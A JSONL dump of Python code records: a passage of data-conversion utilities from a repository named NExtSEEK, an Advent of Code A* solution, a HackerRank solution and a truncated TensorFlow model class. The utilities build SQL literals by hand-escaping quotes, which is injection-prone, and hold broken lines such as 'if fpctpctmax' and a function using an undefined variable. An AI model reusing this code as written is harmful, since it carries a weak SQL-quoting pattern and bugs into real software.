valueIn==0:\r\n valueOut = False\r\n elif valueIn==1:\r\n valueOut = True\r\n else:\r\n valueOut = False\r\n \r\n return valueOut\r\n\r\ndef toBinaryTinyInt(valueIn):\r\n valueOut = 0\r\n if valueIn is None:\r\n return valueOut \r\n \r\n try:\r\n valueOut = int(valueIn)\r\n if valueOut!=1:\r\n valueOut = 0\r\n \r\n except ValueError:\r\n try:\r\n sss = str(valueIn)\r\n sss = sss.lower().strip()\r\n if sss=='true':\r\n valueOut = 1\r\n elif sss=='yes':\r\n valueOut = 1\r\n else:\r\n valueOut = 0\r\n except ValueError:\r\n valueOut = 0\r\n \r\n return valueOut\r\n\r\ndef toFloat(valueIn):\r\n if valueIn is None:\r\n valueOut = 0.0\r\n else:\r\n try:\r\n valueOut = float(valueIn)\r\n except ValueError:\r\n valueOut = 0.0\r\n \r\n return valueOut\r\n\r\ndef formatPercent(valueIn, zerostring=' '):\r\n if valueIn is None:\r\n valueOut = zerostring\r\n elif valueIn==0:\r\n valueOut = zerostring\r\n else:\r\n value = \"%.0f\" % valueIn\r\n valueOut = str(value)\r\n return valueOut\r\n\r\ndef formatStringMSSQL(strin):\r\n if strin is None:\r\n strout = strin\r\n else:\r\n strin = strin.strip()\r\n if \"'\" in strin:\r\n str1 = strin.replace(\"'\", \"''\")\r\n else:\r\n str1 = strin\r\n \r\n if '\"' in str1:\r\n strout = str1.replace('\"', \"''\")\r\n else:\r\n strout = str1\r\n return strout\r\n\r\ndef intToStr(valueIn):\r\n if valueIn is None:\r\n valueOut = ' '\r\n elif valueIn==0:\r\n valueOut = ' '\r\n else:\r\n valueOut = str(valueIn)\r\n return valueOut\r\n \r\n\r\ndef format_currency(valueIn, nonestring='$0'):\r\n if valueIn is None:\r\n value = nonestring \r\n elif valueIn < 0:\r\n try:\r\n results = '${:,.0f}'.format(valueIn)\r\n value = \"(\" + results.replace(\"-\",\"\") + \")\"\r\n except ValueError:\r\n value = str(valueIn)\r\n \r\n elif valueIn > 0:\r\n results = '${:,.0f}'.format(valueIn)\r\n value = str(results)\r\n else:\r\n value = nonestring\r\n return value\r\n\r\ndef toCurrency(valueIn, nonestring='$0'):\r\n if valueIn is None:\r\n valueOut = nonestring\r\n elif not is_numeric(valueIn):\r\n valueOut = nonestring\r\n elif valueIn==0:\r\n valueOut = nonestring\r\n else:\r\n valueOut = format_currency(toFloat(valueIn))\r\n return valueOut\r\n\r\n\r\ndef fromCurrency(valueIn):\r\n if valueIn is None:\r\n valueOut = 0\r\n return valueOut\r\n \r\n sss = str(valueIn)\r\n if sss[0]=='$': \r\n sss = sss[1:] \r\n \r\n if ',' in sss: \r\n sss=sss.replace(',', '') \r\n\r\n try:\r\n valueOut = float(sss)\r\n except ValueError:\r\n valueOut = 0\r\n return valueOut\r\n\r\ndef toDate(dateIn):\r\n if dateIn is None:\r\n dateOut = ' '\r\n else:\r\n dt = datetime.datetime.strptime(dateIn, '%Y-%m-%d')\r\n dateOut = '{0}/{1}/{2:02}'.format(dt.month, dt.day, dt.year % 100)\r\n return dateOut\r\n \r\ndef toUSDate(dateIn):\r\n if dateIn is None:\r\n dateOut = ' '\r\n else:\r\n dt = datetime.datetime.strptime(dateIn, '%Y-%m-%d')\r\n dateOut = '{0:02}/{1:02}/{2:04}'.format(dt.month, dt.day, dt.year)\r\n return dateOut\r\n \r\ndef toDateClass(datetimein):\r\n if datetimein is None:\r\n return None\r\n \r\n if isinstance(datetimein, datetime.date):\r\n return datetimein\r\n elif isinstance(datetimein, datetime.time):\r\n return None\r\n elif isinstance(datetimein, datetime.datetime):\r\n return datetimein\r\n \r\n strs1 = datetimein.split(' ')\r\n if len(strs1)>1:\r\n strs2 = strs1[0]\r\n if len(strs1[1])>0:\r\n return None\r\n else:\r\n strs2 = datetimein\r\n \r\n if '/' in strs2:\r\n strs3 = strs2.split('/')\r\n if len(strs3)==3:\r\n yearStr = strs3[2]\r\n if len(yearStr)!=4:\r\n return None\r\n \r\n try:\r\n dateout = date(int(strs3[2]), int(strs3[0]), int(strs3[1]))\r\n except:\r\n dateout = None\r\n else:\r\n dateout = None\r\n elif '-' in strs2:\r\n strs3 = strs2.split('-')\r\n if len(strs3)==3:\r\n try:\r\n dateout = date(int(strs3[0]), int(strs3[1]), int(strs3[2]))\r\n except:\r\n dateout = None\r\n else:\r\n dateout = None\r\n else:\r\n dateout = None\r\n \r\n return dateout\r\n \r\ndef dateconversion(datetimein):\r\n if datetimein is None:\r\n return \" \"\r\n \r\n strs1 = datetimein.split(' ')\r\n if len(strs1)>1:\r\n strs2 = strs1[0]\r\n strs3 = strs2.split('/')\r\n if len(strs3)==3:\r\n dateout = date(int(strs3[2]), int(strs3[0]), int(strs3[1]))\r\n else:\r\n dateout = strs2\r\n\r\n timein = strs1[1] \r\n timeout = __timeconversion(timein)\r\n datetimeout = str(dateout) + 'T' + timeout\r\n else:\r\n strs3 = datetimein.split('/')\r\n if len(strs3)==3:\r\n dateout = date(int(strs3[2]), int(strs3[0]), int(strs3[1]))\r\n else:\r\n dateout = datetimein\r\n\r\n datetimeout = str(dateout)\r\n return datetimeout \r\n \r\ndef toISODate(datetimein):\r\n if datetimein is None:\r\n return None\r\n \r\n if isinstance(datetimein, datetime.date):\r\n try:\r\n dateout = datetimein.date()\r\n except:\r\n dateout = datetimein\r\n return dateout\r\n str0 = str(datetimein)\r\n strs1 = str0.split(' ')\r\n if len(strs1)>1:\r\n strs2 = strs1[0] # '8/16/2012'\r\n strs3 = strs2.split('/')\r\n if len(strs3)==3:\r\n try:\r\n dateout = date(int(strs3[2]), int(strs3[0]), int(strs3[1]))\r\n except:\r\n dateout = None\r\n else:\r\n dateout = strs2\r\n else:\r\n strs3 = datetimein.split('/')\r\n if len(strs3)==3:\r\n try:\r\n dateout = date(int(strs3[2]), int(strs3[0]), int(strs3[1]))\r\n except:\r\n dateout = None\r\n else:\r\n dateout = datetimein\r\n\r\n if dateout is None:\r\n datetimeout = None\r\n else:\r\n datetimeout = str(dateout) \r\n return datetimeout \r\n \r\ndef monthconversion(datetimein):\r\n strs1 = datetimein.split(' ')\r\n if len(strs1)>1:\r\n strs2 = strs1[0] \r\n strs3 = strs2.split('/')\r\n if len(strs3)==3:\r\n dateout = date(int(strs3[2]), int(strs3[0]), int(strs3[1]))\r\n else:\r\n dateout = strs2\r\n\r\n timein = strs1[1] \r\n timeout = __timeconversion(timein)\r\n datetimeout = str(dateout) + 'T' + timeout\r\n else:\r\n strs3 = datetimein.split('/')\r\n if len(strs3)==3:\r\n dateout = strs3[0] + '/' + strs3[2]\r\n else:\r\n dateout = datetimein\r\n\r\n datetimeout = str(dateout) \r\n return datetimeout \r\n \r\ndef dateToString(dateIn):\r\n if dateIn is None:\r\n dateOut = ' '\r\n else:\r\n if isinstance(dateIn, datetime.date):\r\n dateOut = '{0}/{1}/{2:02}'.format(dateIn.month, dateIn.day, dateIn.year % 100)\r\n elif isinstance(dateIn, datetime.datetime):\r\n dateOut = '{0}/{1}/{2:02}'.format(dateIn.month, dateIn.day, dateIn.year % 100)\r\n else:\r\n dateOut = str(dateIn)\r\n return dateOut\r\n\r\ndef dateToISOstring(dateIn):\r\n if dateIn is None:\r\n dateOut = ' '\r\n else:\r\n if isinstance(dateIn, datetime.date):\r\n dateOut = '{0:04}-{1}-{2}'.format(dateIn.year, dateIn.month, dateIn.day)\r\n elif isinstance(dateIn, datetime.datetime):\r\n dateOut = '{0:04}-{1}-{2}'.format(dateIn.year, dateIn.month, dateIn.day)\r\n else:\r\n dateOut = str(dateIn)\r\n return dateOut\r\n\r\ndef convertDateListToString(fieldName, objsdiclist):\r\n newlist = []\r\n for objdic in objsdiclist:\r\n fieldValue = objdic[fieldName]\r\n objdic[fieldName] = dateToString(fieldValue)\r\n newlist.append(objdic)\r\n \r\n return newlist\r\n\r\ndef checkSingleQuote(stringIn):\r\n strtemp = stringIn\r\n if \"''\" in stringIn:\r\n strtemp = stringIn.replace(\"''\", \"__\")\r\n \r\n if \"'\" in strtemp:\r\n strtemp = strtemp.replace(\"'\", \"''\")\r\n \r\n if \"__\" in strtemp:\r\n strtemp = strtemp.replace(\"__\", \"''\")\r\n \r\n return strtemp\r\n \r\ndef is_numeric(s):\r\n if s is None:\r\n return False\r\n \r\n try:\r\n i = float(s)\r\n except ValueError:\r\n return False\r\n return True\r\n \r\ndef getYearFromDate(dateIn):\r\n year = 0\r\n if \"/\" in dateIn:\r\n terms = dateIn.split(\"/\")\r\n if len(terms)==3:\r\n year = int(terms[2])\r\n else:\r\n year = 0\r\n elif \"-\" in dateIn:\r\n terms = dateIn.split(\"-\")\r\n if len(terms)==3:\r\n year = int(terms[0])\r\n else:\r\n year = 0\r\n return year\r\n \r\ndef toStringDB(itemIn):\r\n if itemIn is None:\r\n itemOut = ' '\r\n else:\r\n if type(itemIn) == str:\r\n itemOut = str(itemIn)\r\n else:\r\n try:\r\n itemOut = str(itemIn)\r\n except:\r\n itemOut = unidecode(itemIn)\r\n \r\n if '\\x19' in itemOut:\r\n itemOut = itemOut.replace('\\x19', '')\r\n return itemOut.strip()\r\n \r\ndef cleanStringDB(itemIn):\r\n if type(itemIn)==unicode:\r\n itemOut = itemIn.encode(\"utf-8\")\r\n return itemOut\r\n \r\n newitem = unicode(itemIn, \"utf-8\", errors=\"ignore\")\r\n itemOut = unidecode(newitem)\r\n return itemOut\r\n\r\ndef verifyUSDate(usdateIn):\r\n try:\r\n datetime.datetime.strptime(usdateIn, '%m/%d/%Y')\r\n return True\r\n except ValueError:\r\n return False\r\n return False\r\n \r\ndef convertBoolstrToInt(valueIn):\r\n if valueIn is None:\r\n value = -1\r\n return value\r\n \r\n valueStr = str(valueIn)\r\n valueStr = valueStr.upper()\r\n if valueStr==\"YES\":\r\n value = 1\r\n elif valueStr==\"NO\":\r\n value = 0\r\n elif valueStr==\"1\":\r\n value = 1\r\n elif valueStr==\"0\":\r\n value = 0\r\n else:\r\n value = -1\r\n \r\n return value\r\n\r\ndef convertBoolstrToBool(valueIn):\r\n if valueIn is None:\r\n value = False\r\n return value\r\n \r\n valueStr = str(valueIn)\r\n valueStr = valueStr.upper()\r\n if valueStr==\"YES\":\r\n value = True\r\n elif valueStr==\"NO\":\r\n value = False\r\n elif valueStr==\"1\":\r\n value = True\r\n elif valueStr==\"0\":\r\n value = False\r\n elif valueStr==\"TRUE\":\r\n value = True\r\n elif valueStr==\"False\":\r\n value = False\r\n else:\r\n value = False\r\n \r\n return value\r\n \r\ndef convertInttoBoolstr(valueIn):\r\n if valueIn is None:\r\n value = 'N/A'\r\n value = '?'\r\n elif valueIn==1:\r\n value = \"Yes\"\r\n elif valueIn==0:\r\n value = \"No\"\r\n else:\r\n value = 'N/A'\r\n value = '?'\r\n \r\n return value\r\n\r\ndef percentToFloat(percentIn):\r\n if percentIn is None:\r\n return 0.00\r\n \r\n valuein = str(percentIn)\r\n valuein= valuein.strip()\r\n if \"%\" in valuein:\r\n valuein = valuein.replace('%','')\r\n \r\n pct = toFloat(valuein)\r\n return pct\r\n \r\ndef percentValidate(pct, pctmin, pctmax):\r\n msg = \"okay\"\r\n status = 1\r\n if pct is None:\r\n msg = \"Percent not valid: None\"\r\n status = 0\r\n return msg, status\r\n \r\n try:\r\n pctstr = str(pct)\r\n if \"%\" in pctstr:\r\n pctstr = pctstr.replace('%','')\r\n \r\n fpct = float(pctstr)\r\n if fpctpctmax:\r\n msg = \"Percent not valid: \" + str(pct)\r\n status = 0\r\n else:\r\n value = percentToFloat(fpct)\r\n msg = \"Percent converted: \" + str(value) + ' from ' + str(pct)\r\n \r\n except:\r\n msg = \"Percent not valid: \" + pct\r\n status = 0\r\n \r\n return msg, status\r\n \r\ndef stringValidate(strIn, validStrings):\r\n status = 1\r\n msg = 'ok'\r\n if strIn is None:\r\n msg = \"String is invalid None. \"\r\n status = 0\r\n return msg, status\r\n \r\n try:\r\n strok = str(strIn)\r\n strok = strok.strip()\r\n if strok not in validStrings:\r\n msg = \"String not on the list: \" + strok\r\n status = 0\r\n else:\r\n msg = \"String is valid: \" + strok\r\n #status = 0\r\n except:\r\n msg = \"String not valid: \" + strIn\r\n status = 0\r\n \r\n return msg, status\r\n \r\n \r\ndef retrieveSubset(listdics, headers):\r\n newlistdics = []\r\n for row in listdics:\r\n newrow = dict((k, row[k]) for k in headers if k in row)\r\n newlistdics.append(newrow)\r\n return newlistdics \r\n \r\ndef convertInttoBoolstr(valueIn):\r\n if value is None:\r\n value = 'N/A'\r\n value = '?'\r\n elif value==1:\r\n value = \"Yes\"\r\n elif value==0:\r\n value = \"No\"\r\n else:\r\n value = 'N/A'\r\n value = '?'\r\n \r\n return value \r\n \r\ndef convertBoolstrToInt(valueIn):\r\n if valueIn is None:\r\n value = -1\r\n return value\r\n \r\n valueStr = str(valueIn)\r\n valueStr = valueStr.upper()\r\n if valueStr==\"YES\":\r\n value = 1\r\n elif valueStr==\"NO\":\r\n value = 0\r\n elif valueStr==\"1\":\r\n value = 1\r\n elif valueStr==\"0\":\r\n value = 0\r\n else:\r\n value = -1\r\n \r\n return value\r\n\r\ndef floatToStr(valueIn):\r\n if valueIn is None:\r\n valueOut = str(NONE_VALUE)\r\n elif valueIn==0:\r\n valueOut = '0'\r\n else:\r\n valueOut = str(valueIn)\r\n return valueOut\r\n\r\ndef toUSAZipcode(valueIn):\r\n if valueIn is None:\r\n valueOut = ''\r\n elif len(str(valueIn))==0:\r\n valueOut = ''\r\n else:\r\n valueOut = str(valueIn).zfill(5)\r\n return valueOut\r\n\r\ndef dateToStringUK(dateIn):\r\n if dateIn is None:\r\n dateOut = None\r\n elif len(str(dateIn))==0:\r\n dateOut = None\r\n elif len(str(dateIn))<4:\r\n dateOut = None\r\n elif len(str(dateIn))==4:\r\n try:\r\n dt = parse(str(dateIn))\r\n dateOut = '{0:04}-{1}-{2}'.format(dt.year, 12, 31)\r\n except ValueError:\r\n msg = 'Not right date format: ', dateIn\r\n dateOut = None\r\n else:\r\n if isinstance(dateIn, datetime.date):\r\n dateOut = '{0:04}-{1}-{2}'.format(dateIn.year, dateIn.month, dateIn.day)\r\n elif isinstance(dateIn, datetime.datetime):\r\n dateOut = '{0:04}-{1}-{2}'.format(dateIn.year, dateIn.month, dateIn.day)\r\n else:\r\n dateOut = validateDate(dateIn)\r\n return dateOut\r\n\r\ndef absFloats(float1, float2):\r\n diff = 0.0\r\n if float1 is None and float2 is None:\r\n diff = 0.0\r\n elif float1 is None:\r\n if float2==NONE_VALUE:\r\n diff = 0.0\r\n else:\r\n diff = abs(float2)\r\n elif float2 is None:\r\n if float1==NONE_VALUE:\r\n diff = 0.0\r\n else:\r\n diff = abs(float1)\r\n else:\r\n if float1==NONE_VALUE and float2==NONE_VALUE:\r\n diff = 0.0\r\n elif float1==NONE_VALUE:\r\n diff = abs(float2)\r\n elif float2==NONE_VALUE:\r\n diff = abs(float1)\r\n else:\r\n diff = abs(float1 - float2)\r\n \r\n return diff\r\n \r\n \r\ndef validateDate(dateIn):\r\n try:\r\n dt = parse(dateIn)\r\n dateOut = '{0:04}-{1}-{2}'.format(dt.year, dt.month, dt.day)\r\n except ValueError:\r\n msg = 'Not right date format: ', dateIn\r\n dateOut = None\r\n \r\n return dateOut\r\n \r\ndef toBooleanValue(formdata, fieldname):\r\n value_new = False\r\n if fieldname in formdata:\r\n value = formdata[fieldname]\r\n if value is not None:\r\n value = str(value)\r\n value = value.upper().strip()\r\n if value==\"1\" or value==\"Y\" or value==\"YES\" or value==\"TRUE\" or value==\"T\":\r\n value_new = True\r\n \r\n formdata[fieldname] = value_new\r\n return formdata\r\n\r\ndef getDefaultDate():\r\n datenow = datetime.datetime.now().strftime(\"%Y-%m-%d\")\r\n return datenow\r\n\r\ndef getDefaultDate():\r\n datenow = datetime.datetime.now().strftime(\"%Y-%m-%d\")\r\n return datenow\r\n\r\ndef getDefaultDateTime():\r\n datenow = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\r\n return datenow\r\n\r\ndef cleanString(itemIn):\r\n return cleanStringDB(itemIn)\r\n \r\ndef convertSQLString(value):\r\n if isinstance(value, datetime.date):\r\n strValue = \"'\" + str(value) + \"'\"\r\n elif is_numeric(value):\r\n strValue = str(value)\r\n else:\r\n if value is None:\r\n strValue = \"''\"\r\n elif \"'\" in value:\r\n strValue = value.replace(\"'\", \"''\")\r\n strValue = \"'\" + strValue + \"'\"\r\n elif '\"' in value:\r\n strValue = value.replace('\"', \"''\")\r\n strValue = \"'\" + strValue + \"'\"\r\n else:\r\n strValue = \"'\" + value + \"'\"\r\n \r\n return strValue\r\n\r\ndef handle_uploaded_file(infile, outfilename):\r\n dest = open(outfilename, 'wb')\r\n for chunk in infile.chunks():\r\n dest.write(chunk)\r\n dest.close()\r\n \r\ndef correctFileName(infilename):\r\n if infilename is None:\r\n return None\r\n \r\n outfilename = infilename.strip()\r\n if ' ' in outfilename:\r\n outfilename = outfilename.replace(' ', '-')\r\n \r\n return outfilename\r\n \r\ndef convertDicToOptions(dicIn):\r\n options = []\r\n \r\n si = {\"selected\": 'true', \"id\": 0, \"title\": \"\"}\r\n options.append(si)\r\n for k,v in dicIn.items():\r\n si = {}\r\n si[\"id\"] = k\r\n si[\"title\"] = v\r\n options.append(si)\r\n return options\r\n \r\n \r\ndef sizeof_fmt(num):\r\n if num is None:\r\n return ''\r\n \r\n num = toInt(num)\r\n unit_list = zip(['bytes', 'kB', 'MB', 'GB', 'TB', 'PB'], [0, 0, 1, 2, 2, 2])\r\n if num > 1:\r\n exponent = min(int(log(num, 1024)), len(unit_list) - 1)\r\n quotient = float(num) / 1024**exponent\r\n unit, num_decimals = unit_list[exponent]\r\n format_string = '{:.%sf} {}' % (num_decimals)\r\n return format_string.format(quotient, unit)\r\n if num == 0:\r\n return '0 bytes'\r\n if num == 1:\r\n return '1 byte'\r\n \r\n \r\ndef getFileChecksum(fullfilename, checksumFormat='MD5'):\r\n cf = checksumFormat.upper()\r\n if cf=='MD5':\r\n fi = open(fullfilename,'rb').read()\r\n md5 = hashlib.md5(fi).hexdigest()\r\n checksum = md5\r\n elif cf=='SHA1':\r\n openedFile = open(fullfilename,'rb')\r\n readFile = openedFile.read()\r\n sha1Hash = hashlib.sha1(readFile)\r\n sha1Hashed = sha1Hash.hexdigest()\r\n checksum = sha1Hashed\r\n else:\r\n checksum = 'NA'\r\n return checksum\r\n \r\n \r\ndef verifyFileChecksum(fullfilename):\r\n fi = open(fullfilename,'rb').read()\r\n md5 = hashlib.md5(fi).hexdigest()\r\n \r\n sha1Hash = hashlib.sha1(fi)\r\n sha1 = sha1Hash.hexdigest()\r\n \r\n filesize = os.path.getsize(fullfilename)\r\n return md5, sha1, filesize\r\n \r\n \r\n \r\ndef verifyValueType(valuetype, value):\r\n if valuetype is None:\r\n return False\r\n \r\n valuetypeStr = toString(valuetype)\r\n valuetypeStr = valuetypeStr.strip().upper()\r\n \r\n if valuetypeStr=='DATE':\r\n dateValue = toDateClass(value)\r\n if dateValue is None:\r\n return False\r\n else:\r\n return True\r\n elif valuetypeStr=='TEXT':\r\n valueStr = toString(value)\r\n return True\r\n elif valuetypeStr=='NUMBER' or valuetypeStr=='FLOAT':\r\n return is_numeric(value)\r\n \r\n return True\r\n \r\n \r\ndef main():\r\n parser = argparse.ArgumentParser(description=\"Submit a data file through API call to the Seek system\",\r\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\r\n parser.add_argument('inputFilename', help='Input file')\r\n args = parser.parse_args()\r\n inputfile = args.inputFilename\r\n getFileChecksum(inputfile, 'MD5')\r\n getFileChecksum(inputfile, 'SHA1')\r\n return\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n ","repo_name":"BMCBCC/NExtSEEK","sub_path":"dmac/conversion.py","file_name":"conversion.py","file_ext":"py","file_size_in_byte":23027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"18603995540","text":"\"\"\" Advent of code Year 2022 Day 12 solution\nAuthor = Averbea\nDate = December 2022\n\"\"\"\n\n\nimport math\nimport os\nfrom time import time\n\n\ndef measure_timing(func):\n \"\"\"measures the time needed for executing the given function\"\"\"\n time_start = time()\n result = func()\n time_end = time()\n return time_end-time_start, result\n\n\nclass Node:\n \"\"\"class representing a Node\"\"\"\n\n def __init__(self, pos: tuple[int, int], predecessor=None) -> None:\n self.pos = pos\n self.predecessor = predecessor\n\n self.dist_to_start = 0\n\n def __eq__(self, other) -> bool:\n return self.pos == other.pos\n\n def __repr__(self) -> str:\n return str(self.pos)\n\n\ndef parse_input():\n \"\"\"parses the input file and returns the result\"\"\"\n with open(os.path.dirname(__file__) + \"/input.txt\", 'r', encoding=\"UTF-8\") as input_file:\n inputs = input_file.read().splitlines()\n grid = list(map(lambda el: [*el], inputs))\n return grid\n\n\ndef get_starting_s_and_end(grid):\n \"\"\"get S as starting positions and end position\"\"\"\n start = end = None\n for y_pos, line in enumerate(grid):\n for x_pos, col in enumerate(line):\n if col == \"S\":\n start = (y_pos, x_pos)\n if col == \"E\":\n end = (y_pos, x_pos)\n assert start is not None\n assert end is not None\n return start, end\n\n\ndef get_starting_positions_and_end(grid):\n \"\"\"get S and all occurences of a as starting position and end position\"\"\"\n starts = []\n end = None\n for y_pos, line in enumerate(grid):\n for x_pos, col in enumerate(line):\n if col == \"S\" or col == \"a\":\n starts.append((y_pos, x_pos))\n if col == \"E\":\n end = (y_pos, x_pos)\n assert starts is not None\n assert end is not None\n return starts, end\n\n\ndef lookup(char):\n \"\"\"get comparable values for chars\"\"\"\n\n if char == \"E\":\n char = \"z\"\n if char == \"S\":\n char = \"a\"\n\n return ord(char)\n\n\ndef get_neighbors(data: list[list[str]], cur_pos: tuple[int, int]):\n \"\"\"get neighbor positions for cur_pos in data\"\"\"\n\n neighbors = []\n\n y_pos, x_pos = cur_pos\n cur_data = data[y_pos][x_pos]\n cur_val = lookup(cur_data)\n height = len(data)\n width = len(data[0])\n\n directions = [(0, -1), (-1, 0), (0, 1), (1, 0)]\n\n for dir_y, dir_x in directions:\n if 0 <= y_pos + dir_y < height and 0 <= x_pos + dir_x < width:\n neighbor_data = data[y_pos + dir_y][x_pos + dir_x]\n neighbor_val = lookup(neighbor_data)\n if neighbor_val <= cur_val + 1:\n neighbors.append((y_pos + dir_y, x_pos+dir_x))\n\n return neighbors\n\n\ndef heuristic(position: tuple[int, int], target: tuple[int, int]):\n \"\"\"heuristic function\"\"\"\n return abs(target[0] - position[0]) + abs(target[1] - position[1])\n\n\ndef total_cost(node: Node, target: tuple[int, int]):\n \"\"\"calculate the total cost to end node\"\"\"\n return node.dist_to_start + heuristic(node.pos, target)\n\n\ndef a_star(data: list[list[str]], start_pos: tuple[int, int], end_pos: tuple[int, int]):\n \"\"\"A star algorithm\"\"\"\n start_node = Node(start_pos)\n end_node = Node(end_pos)\n # open list contains start node\n open_list: list[Node] = [start_node]\n # closed list is initially empty\n closed_list: list[Node] = []\n\n # until there are no nodes to explore\n while len(open_list) > 0:\n # get node with minimum total cost from open_list\n cur_node = open_list[0]\n cur_index = 0\n for index, node in enumerate(open_list):\n if total_cost(node, end_pos) < total_cost(cur_node, end_pos):\n cur_node = node\n cur_index = index\n open_list.pop(cur_index)\n\n if cur_node.pos == end_node.pos:\n # Backtrack to get path\n path = [cur_node.pos]\n while cur_node is not None:\n path.append(cur_node.pos)\n cur_node = cur_node.predecessor\n\n return path[1:-1][::-1]\n\n # add this node to closed list\n closed_list.append(cur_node)\n\n # Expand node\n neighbor_positions = get_neighbors(data, cur_node.pos)\n for neighbor_pos in neighbor_positions:\n neighbor_node = Node(neighbor_pos, cur_node)\n\n # if this neighbor is closed it there is nothing to do\n if neighbor_node in closed_list:\n continue\n\n # calculate new distance\n new_distance = cur_node.dist_to_start + 1\n\n # if new node is in open list and has a smaller distance there is nothing to do\n\n if neighbor_node in open_list:\n index = open_list.index(neighbor_node)\n if new_distance >= open_list[index].dist_to_start:\n continue\n\n # set predecessor and current node\n neighbor_node.predecessor = cur_node\n neighbor_node.dist_to_start = new_distance\n\n # add node to open list\n open_list.append(neighbor_node)\n return []\n\n\ndef part_one():\n \"\"\"Solution for Part 1\"\"\"\n data = parse_input()\n\n start_pos, end_pos = get_starting_s_and_end(data)\n path = a_star(data, start_pos, end_pos)\n return len(path)\n\n\ndef part_two():\n \"\"\"Solution for Part 2\"\"\"\n data = parse_input()\n\n starting_positions, end_pos = get_starting_positions_and_end(data)\n paths = []\n\n for i, start_pos in enumerate(starting_positions):\n print(i, \"/\", len(starting_positions))\n path = a_star(data, start_pos, end_pos)\n paths.append(path)\n\n minimum = math.inf\n print(\"done\")\n for path in paths:\n if len(path) != 0:\n minimum = min(len(path), minimum)\n\n return minimum\n\n\ndef main():\n \"\"\"main method\"\"\"\n time_needed, result = measure_timing(part_one)\n\n print(\"Part One : \" + str(result))\n print(\"time elapsed: \" + str(time_needed))\n\n time_needed, result = measure_timing(part_two)\n print(\"\\nPart Two : \" + str(result))\n print(\"time elapsed: \" + str(time_needed))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Averbea/AdventOfCode","sub_path":"2022/12/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":6109,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"4917482715","text":"from collections import deque\n\nfor _ in range(int(input())):\n t, side = input(), list(map(int, input().split()))\n num = max(side[0], side[-1])\n while True:\n try:\n if (side[0] >= side[-1]) and (side[0] <= num):\n num = side.pop(0)\n elif (side[0] < side[-1]) and (side[-1] <= num):\n num = side.pop(-1)\n else:\n print('No')\n break\n except IndexError:\n break\n\n if side == []: print('Yes')\n \n","repo_name":"PROxZIMA/Competitive-Coding","sub_path":"Hackerrank/Python/piling-up.py","file_name":"piling-up.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"18679269811","text":"import os\nimport sys\nimport shutil\nimport numpy as np\n\nimport tensorflow as tf\nfrom tensorflow.python.summary import summary\n\nfrom learning.neuralnet.NeuralNetEstimator import NeuralNetEstimator\nfrom learning.neuralnet.NeuralNetDatasetHandler import NeuralNetDatasetHandler\nfrom learning.neuralnet.NeuralNetDatasetMaker import NeuralNetDatasetMaker\nfrom utils.Dataset import Dataset\n\nfrom official.utils.logs import hooks_helper\nfrom official.utils.logs import logger\nfrom official.utils.misc import model_helpers\n\n\nclass NeuralNetModel():\n\n def __init__(self, mode, dict_dataset_options, feature_columns, flags):\n self.feature_columns = feature_columns;\n self.dataset_options_train = dict_dataset_options['train'];\n self.dataset_options_eval = dict_dataset_options['eval'];\n self.dataset_options_test = dict_dataset_options['test'];\n self.mode = mode;\n self.flags = flags;\n\n if not os.path.exists(self.flags.model_dir):\n os.makedirs(self.flags.model_dir)\n\n if self.mode == 'train':\n if self.dataset_options_eval is not None:\n self.dataset_handler_train = NeuralNetDatasetHandler(self.flags.model_dir, self.dataset_options_train, feature_columns, 'train', self.dataset_options_train);\n self.dataset_handler_eval = NeuralNetDatasetHandler(self.flags.model_dir, self.dataset_options_eval, feature_columns, 'eval');\n else:\n self.dataset_handler_train = NeuralNetDatasetHandler(self.flags.model_dir, self.dataset_options_train, feature_columns, 'train');\n self.dataset_handler_eval = NeuralNetDatasetHandler(self.flags.model_dir, self.dataset_options_train, feature_columns, 'eval');\n elif self.mode == 'test':\n self.dataset_handler_train = NeuralNetDatasetHandler(self.flags.model_dir, self.dataset_options_train, feature_columns, 'train');\n self.dataset_handler_eval = NeuralNetDatasetHandler(self.flags.model_dir, self.dataset_options_train, feature_columns, 'eval');\n self.dataset_handler_test = NeuralNetDatasetHandler(self.flags.model_dir, self.dataset_options_test, feature_columns, 'test');\n\n self.model = None;\n self.flags.hidden_units = [int(u) for u in self.flags.hidden_units];\n return;\n\n def _setModelDir(self):\n modeldir_base = self.flags.model_dir;\n dropoutrate = self.flags.dropout;\n learningrate = self.flags.learningrate;\n batchnorm = self.flags.batchnorm;\n batchsize = self.flags.batch_size;\n dataset_filename_options = self.dataset_options_train.getFilenameOptions(filteroptions=False);\n suffix_modeldir = '';\n if self.flags.continue_training:\n suffix_modeldir = 'warmstart_';\n suffix_modeldir = suffix_modeldir + dataset_filename_options + '_' + str(self.flags.hidden_units[0]);\n\n for k in range(1, len(self.flags.hidden_units)):\n suffix_modeldir = suffix_modeldir + '_' + str(self.flags.hidden_units[k]);\n\n suffix_modeldir = suffix_modeldir + '_dropout_' + str(dropoutrate);\n suffix_modeldir = suffix_modeldir + '_learningrate_' + str(learningrate);\n suffix_modeldir = suffix_modeldir + '_batchnorm_' + str(batchnorm);\n suffix_modeldir = suffix_modeldir + '_batchsize_' + str(batchsize);\n\n # Add filtering option if specified\n if self.dataset_handler_train.dataset.options.options_filtering is not None:\n suffix_modeldir += '_filtering_' + str(self.dataset_handler_train.dataset.options.options_filtering)\n\n model_dir = os.path.join(modeldir_base, suffix_modeldir);\n self.flags.model_dir = model_dir;\n if self.mode == 'train':\n if self.dataset_options_eval is not None:\n self.dataset_handler_train.update_model_dir(self.flags.model_dir);\n self.dataset_handler_eval.update_model_dir(self.flags.model_dir);\n else:\n self.dataset_handler_train.update_model_dir(self.flags.model_dir);\n self.dataset_handler_eval.update_model_dir(self.flags.model_dir);\n elif self.mode == 'test':\n self.dataset_handler_train.update_model_dir(self.flags.model_dir);\n self.dataset_handler_eval.update_model_dir(self.flags.model_dir);\n self.dataset_handler_test.update_model_dir(self.flags.model_dir);\n\n\n def _input_fn_train(self):\n dataset = 